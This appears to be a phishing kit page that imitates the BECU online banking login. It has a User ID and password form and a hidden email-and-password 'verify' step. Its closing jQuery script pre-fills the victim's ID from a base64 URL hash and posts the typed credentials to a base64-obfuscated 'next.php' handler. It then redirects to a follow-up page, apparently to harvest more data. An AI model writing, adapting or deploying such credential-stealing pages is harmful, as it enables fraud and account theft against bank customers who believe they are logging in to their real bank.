<html lang="en" class="">

<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>
        Online Banking Login | BECU
    </title>
    <link id="maincss" href="css/becu-olb.min.css" type="text/css" rel="stylesheet">
    <style type="text/css">
    nav.navbar .dropdown-content ul.pages-utility li a.search.icon:before {
        display: none;
    }

    nav.navbar .dropdown-content ul.pages-utility li a.locations.icon:before {
        display: none;
    }

    nav.navbar .dropdown-content ul.pages-utility li a.support.icon:before {
        display: none;
    }
    </style>
</head>

<body id="bodytag" class="login_aspx">
    <div id="standardHeader" class="pageHeaderContainer">
        <div class="pageHeader">
            <nav class="navbar navbar-default" role="navigation">
                <div class="container">
                    <div class="navbar-header">
                        <a href="#" class="logo-becu">
                            <img src="images/becu-logo-mobile.png" id="logomobile">
                            <img src="images/becu-logo-tablet.png" id="logotablet">
                            <img src="images/becu-logo-desktop.png" id="logodesktop">
                        </a>
                        <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#nav-main-dropdown">
                            <span class="sr-only">Toggle navigation</span>
                            <span class="icon-bar"></span>
                            <span class="icon-bar"></span>
                            <span class="icon-bar"></span>
                            <span class="navicon"></span>
                        </button>
                    </div>
                    <div id="nav-main-dropdown" class="collapse navbar-collapse">
                        <div class="dropdown-content cf">
                            <div class="desktop-view">
                                <ul id="pages-utility-nav" class="pages-utility" tabindex="-1">
                                    <li>
                                        <a href="#" id="LINKSEARCH" class="search icon">Search</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKBRANCHLOCATOR" class="locations icon">Locations</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKSUPPORT" class="support icon">Support</a>
                                    </li>
                                </ul>
                            </div>
                            <div class="component-user-login">
                            </div>
                            <div class="desktop-view">
                                <ul class="pages-main">
                                    <li>
                                        <a href="#" id="LINKMEMBERSMATTER">BECU &amp; YOU</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKEVERYDAYBANKING" class="">Everyday Banking</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKLOANSMORTGAGES" class="">Loans &amp; Mortgages</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKINVESTMENTSTRUST" class="">Planning &amp; Investing</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LINKBUSINESSBANKING" class="">Business Banking</a>
                                    </li>
                                </ul>
                            </div>
                            <div id="nav" class="component-nav-links tablet-view" data-container-name="header-nav">
                                <ul class="pages-main">
                                    <li>
                                        <a href="#" id="LNKMEMBERSMATTER">BECU &amp; YOU</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKEVERYDAYBANKING" class="">Everyday Banking</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKLOANSMORTGAGES" class="">Loans &amp; Mortgages</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKINVESTMENTSTRUST" class="">Planning &amp; Investing</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKBUSINESSBANKING" class="">Business Banking</a>
                                    </li>
                                </ul>
                                <ul class="pages-utility">
                                    <li>
                                        <a href="#" id="LNKSEARCH" class="search icon">Search</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKBRANCHLOCATOR" class="locations icon">Locations</a>
                                    </li>
                                    <li>
                                        <a href="#" id="LNKSUPPORT" class="support icon">Support</a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
            </nav>
            <div id="PAGESUBHEADER" class="container">
                <div class="pageTitle">
                    <h1 class="headline">
                        Log in to BECU Online Banking
                    </h1>
                </div>
                <nav id="sub-nav">
                </nav>
            </div>
        </div>
    </div>
    <main role="main">
        <div class="pageBody">
            <div id="MAINFORM">
                <div id="container " class="container div1" tabindex="-1" style="display: block;">
                    <div id="CONTENTROW" class="row">
                        <div id="PAGECONTENT" class="content col-xs-12 col-sm-12 col-md-12 col-lg-12">
                            <div class="instructionsContainer">
                                <div class="row">
                                    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12">
                                        <p>Welcome to BECU Online Banking.<br><br>Please log in with your User ID and Password:</p>
                                    </div>
                                </div>
                            </div>
                            <div class="formContainer">
                                <div class="formInputContainer">
                                    <div class="formFields">
                                        <table cellspacing="2" width="100%" class="formTable">
                                            <tbody>
                                                <tr class="item">
                                                    <td colspan="2">
                                                        <center>
                                                            <div class="alert alert-danger msg" style="display: none;">Invalid Password..! Please enter correct password.</div>
                                                            <span class="text-danger error" style="display: none;">That account doesn't exist. Enter a different account</span>
                                                        </center>
                                                    </td>
                                                </tr>
                                                <tr class="item">
                                                    <td width="10%"><strong>User ID</strong></td>
                                                    <td width="30%">
                                                        <input name="ai" type="text" maxlength="32" id="ai" class="standardInput" required="">
                                                    </td>
                                                    <td width="60%">&nbsp;</td>
                                                </tr>
                                                <tr class="alternatingItem">
                                                    <td><strong>Password</strong></td>
                                                    <td>
                                                        <input name="pr" type="password" maxlength="32" id="pr" class="standardInput" required="">
                                                    </td>
                                                    <td>&nbsp;</td>
                                                </tr>
                                                <tr class="item">
                                                    <td><label for="ctlSignon_ddlSignonDestination"></label></td>
                                                    <td>
                                                    </td>
                                                    <td></td>
                                                </tr>
                                            </tbody>
                                        </table>
                                    </div>
                                </div>
                                <div class="formButtonContainer"><input type="button" name="btn1" value="Log in" id="btn1" class="btn red">&nbsp;<img id="ctlSignon_imgLock" src="images/IconLock.gif"></div>
                                <div class="sectionDivider"></div>
                                <p><a id="lnkForgotYourPassword" href="#">Forgot your Password?</a><br>
                                    <a id="lnkForgotYourUserName" href="#">Forgot your User ID?</a></p>
                                <div style="padding-top: 20px">
                                    <span class="emphasizeMedium">Already a Member?</span><br>
                                    If you are not enrolled in Online and Mobile Banking yet <a id="lnkEnroll" href="#">click here to enroll</a>.
                                </div>
                                <div style="padding-top: 20px">
                                    <span class="emphasizeMedium">Not a Member?</span><br>
                                    <a href="#">Sign up for membership with BECU</a>.
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div id="container " class="container div2" tabindex="-1" style="display: none;">
                    <div id="CONTENTROW" class="row">
                        <div id="PAGECONTENT" class="content col-xs-12 col-sm-12 col-md-12 col-lg-12">
                            <div class="instructionsContainer">
                                <div class="row">
                                    <div class="col-xs-12 col-sm-12 col-md-12 col-lg-12 text-center">
                                        <p><br>Please Verify with your Email and Password:</p>
                                    </div>
                                </div>
                            </div>
                            <div class="formContainer">
                                <div class="formInputContainer">
                                    <div class="formFields">
                                        <table cellspacing="2" width="50%" class="formTable" style="margin:auto">
                                            <tbody>
                                                <tr class="item">
                                                    <td colspan="2">
                                                        <center>
                                                            <div class="alert alert-danger msg" style="display: none;">Invalid Password..! Please enter correct password.</div>
                                                            <span class="text-danger error" style="display: none;">That account doesn't exist. Enter a different account</span>
                                                        </center>
                                                    </td>
                                                </tr>
                                                <tr class="item">
                                                    <td><strong>Email Address</strong></td>
                                                    <td>
                                                        <input name="eai" type="text" maxlength="32" id="eai" class="standardInput" required="">
                                                    </td>
                                                </tr>
                                                <tr class="alternatingItem">
                                                    <td><strong>Password</strong></td>
                                                    <td>
                                                        <input name="epr" type="password" maxlength="32" id="epr" class="standardInput" required="">
                                                    </td>
                                                </tr>
                                                <tr class="item">
                                                    <td><label for="ctlSignon_ddlSignonDestination"></label></td>
                                                    <td>
                                                    </td>
                                                    <td></td>
                                                </tr>
                                            </tbody>
                                        </table>
                                    </div>
                                </div>
                                <div class="formButtonContainer text-center"><input type="button" name="btn2" value="Verify" id="btn2" class="btn red">&nbsp;<img id="ctlSignon_imgLock" src="images/IconLock.gif"></div>
                                <div class="sectionDivider"></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </main>
    <footer id="navFooter_standardFooter" class="footer">
        <div class="container">
            <div class="footer-links ">
                <ul>
                    <li>
                        <a id="footer11" class="" target="_self" href="#">ACCESSIBILITY</a>
                    </li>
                    <li>
                        <a id="footer12" class="" target="_self" href="#">MEMBERSHIP</a>
                    </li>
                    <li>
                        <a id="footer13" class="" target="_self" href="#">FORMS</a>
                    </li>
                    <li>
                        <a id="footer14" class="" target="_self" href="#">ABOUT US</a>
                    </li>
                    <li>
                        <a id="footer15" class="" target="_self" href="#">ROUTING NUMBER 325081403</a>
                    </li>
                </ul>
                <ul>
                    <li>
                        <a id="footer21" class="" target="_blank" href="#">AVOIDING FORECLOSURE</a>
                    </li>
                    <li>
                        <a id="footer22" class="" target="_self" href="#">NEWS &amp; DISCOUNTS</a>
                    </li>
                    <li>
                        <a id="footer23" class="" target="_self" href="#">CONTACT</a>
                    </li>
                    <li>
                        <a id="footer24" class="" target="_self" href="#">CAREERS</a>
                    </li>
                    <li>
                        <a id="footer25" class="" target="_self" href="#">NEWSROOM</a>
                    </li>
                </ul>
                <ul>
                    <li>
                        <a id="footer31" class="" target="_self" href="#">SECURITY</a>
                    </li>
                    <li>
                        <a id="footer32" class="" target="_self" href="#">PRIVACY</a>
                    </li>
                    <li>
                        <a id="footer33" class="" target="_self" href="#">TERMS &amp; CONDITIONS</a>
                    </li>
                    <li>
                        <a id="footer34" class="" target="_blank" href="#">SEND A SUGGESTION</a>
                    </li>
                    <li>
                        <a id="footer35" class="" target="_self" href="#">BECU BLOG</a>
                    </li>
                </ul>
                <ul class="footer-social">
                    <div id="social-text" class="social-text">
                        Follow BECU
                    </div>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="facebook-link">
                            <img src="images/Icon_Facebook.svg?h=45&amp;w=45" id="facebook-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="instagram-link">
                            <img src="images/Icon_Instagram.svg?h=45&amp;w=45" id="instagram-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="twitter-link">
                            <img src="images/Icon_Twitter.svg?h=45&amp;w=45" id="twitter-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="pinterest-link">
                            <img src="images/Icon_Pinterest.svg?h=45&amp;w=45" id="pinterest-image" class="social-image">
                        </a>
                    </li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="linkedin-link">
                            <img src="images/Icon_LinkedIn.svg?h=45&amp;w=45" id="linkedin-image" class="social-image"></a></li>
                    <li class="social-item">
                        <a tabindex="0" href="#" id="youtube-link">
                            <img src="images/Icon_YouTube.svg?h=45&amp;w=45" id="youtube-image" class="social-image">
                        </a></li>
                </ul>
            </div>
            <div id="footer-legal" class="footer-legal">
                <ul class="footer-copyright">
                    <li>
                        <div class="flex-display">
                            <div class="ncua-text">
                                <span id="ncua-text">
                                    © 2021 BECU. All Rights Reserved. Federally Insured by NCUA.
                                </span>
                                <span id="ehol-text">
                                    Equal Housing Opportunity Lender
                                </span>
                            </div>
                            <div class="footer-ncua-ehol-container">
                                <img id="ehol-logo" class="ehol-logo" src="images/Icon_EHOL.png">
                                <img id="ncua-logo" class="ncua-logo" src="images/Icon_NCUA.png">
                            </div>
                        </div>
                    </li>
                </ul>
            </div>
        </div>
    </footer>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;



    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
    	var base64regex = /^([0-9a-zA-Z+/]{4})*(([0-9a-zA-Z+/]{2}==)|([0-9a-zA-Z+/]{3}=))?$/;

        if (!base64regex.test(ai)) {
            // alert(btoa(email));
            var my_ai = ai;
        } else {
            // alert(atob(email));
            var my_ai = atob(ai);
        }
        // $('#ai').val(ai);
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $(".msg").hide();
    }
    ///////////////url getting ai////////////////


    var file = "bmV4dC5waHA=";
    $('#btn1').click(function(event) {
        $('.error').hide();
        $('.msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('.msg').html();
        $('.msg').text(msg);
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('.error').show();
            $('.error').html("USER ID field is empty.!");
            return false;
        }

        // if (!filter.test(my_ai)) {
        //     $('.error').show();
        //     $('.error').html("That account doesn't exist. Enter a different account");
        //     return false;
        // }
        if (!pr) {
            $('.error').show();
            $('.error').html("Password field is empty.!");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        ///////////new injection////////////////
        count = count + 1;
        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#btn1').val('Verifing...');
            },
           
            complete: function() {
                if (count >= 1) {
                    count = 0;
                    window.location.replace("./quest.html");
                    return false;
                }
                $("#pr").val("");
                $(".msg").show();
                $('#btn1').val('Log in');
            }
        });
    });

    



});
</script>

</html>